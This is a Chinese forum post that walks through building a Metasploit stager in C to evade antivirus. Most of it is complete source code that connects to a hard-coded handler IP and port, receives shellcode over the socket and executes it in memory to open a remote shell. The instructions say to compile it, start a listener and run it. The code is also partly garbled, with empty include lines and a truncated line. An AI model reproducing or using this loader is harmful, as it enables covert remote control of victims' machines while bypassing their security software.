通过MSF加载器绕过AV

admin · 发表于 2020-11-18 11:32:36

环境

Dev C ++
kali 2020
获取

新建一个 Project 命名为Loader64 并将文件另存为 Loader64。

将 Project 设置为 C Project，将应用程序设置为Console Application。从命令行执行

粘贴下面代码

/*
 * A C-based stager client compat with the Metasploit Framework
 *    based on a discussion on the Metasploit Framework mailing list
 *
 * @author Raphael Mudge (raffi@strategiccyber.com)
 * @license BSD License.
 *
 * Relevant messages:
 * * http://mail.metasploit.com/piper ... ptember/008660.html
 * * http://mail.metasploit.com/piper ... ptember/008664.html
 */

#include 
#include 
#include 
#include 

/* init winsock */
void winsock_init() {
        WSADATA        wsaData;
        WORD                 wVersionRequested;

        wVersionRequested = MAKEWORD(2, 2);

        if (WSAStartup(wVersionRequested, &wsaData) < 0) {
                printf("ws2_32.dll is out of date.\n");
                WSACleanup();
                exit(1);
        }
}

/* a quick routine to quit and report why we quit */
void punt(SOCKET my_socket, char * error) {
        printf("Bad things: %s\n", error);
        closesocket(my_socket);
        WSACleanup();
        exit(1);
}

/* attempt to receive all of the requested data from the socket */
int recv_all(SOCKET my_socket, void * buffer, int len) {
        int    tret   = 0;
        int    nret   = 0;
        void * startb = buffer;
        while (tret < len) {
                nret = recv(my_socket, (char *)startb, len - tret, 0);
                startb += nret;
                tret   += nret;

                if (nret == SOCKET_ERROR)
                        punt(my_socket, "Could not receive data");
        }
        return tret;
}

/* establish a connection to a host:port */
SOCKET wsconnect(char * targetip, int port) {
        struct hostent *                target;
        struct sockaddr_in         sock;
        SOCKET                         my_socket;

        /* setup our socket */
        my_socket = socket(AF_INET, SOCK_STREAM, 0);
        if (my_socket == INVALID_SOCKET)
                punt(my_socket, "Could not initialize socket");

        /* resolve our target */
        target = gethostbyname(targetip);
        if (target == NULL)
                punt(my_socket, "Could not resolve target");


        /* copy our target information into the sock */
        memcpy(&sock.sin_addr.s_addr, target->h_addr, target->h_length);
        sock.sin_family = AF_INET;
        sock.sin_port = htons(port);

        /* attempt to connect */
        if ( connect(my_socket, (struct sockaddr *)&sock, sizeof(sock)) )
                punt(my_socket, "Could not connect to target");

        return my_socket;
}


int main(int argc, char * argv[]) {
        ULONG32 size;
        char * buffer;
        void (*function)();

        winsock_init();

        if (argc != 3) {
                printf("%s [host] [port]\n", argv[0]);
                exit(1);
        }

        /* connect to the handler */
        SOCKET my_socket = wsconnect("192.168.123.33", 5555);

        /* read the 4-byte length */
        int count = recv(my_socket, (char *)&size, 4, 0);
        if (count != 4 || size       mov edi, 0x12345678 */
        buffer[0] = 0x48;
        buffer[0] = 0xBF;

        /* copy the value of our socket to the buffer */
        memcpy(buffer + 2, &my_socket, 8);

        /* read bytes into the buffer */
        count = recv_all(my_socket, buffer + 10, size);

        /* cast our buffer as a function and call it */
        function = (void (*)())buffer;
        function();

        return 0;
}

修改SOCKET my_socket = wsconnect("192.168.123.33", 5555);为你的IP和端口。编译选项中添加-lws2_32 按F9 编译并在msf中监听！在cmd中执行下面命令

Loader64.exe 192.168.123.33 5555

成功得到shell

通过MSF加载器绕过AV

环境

获取

粘贴下面代码

免杀效果

本帖子中包含更多资源

热心会员

推广达人

宣传达人

突出贡献

优秀版主

荣誉管理

论坛元老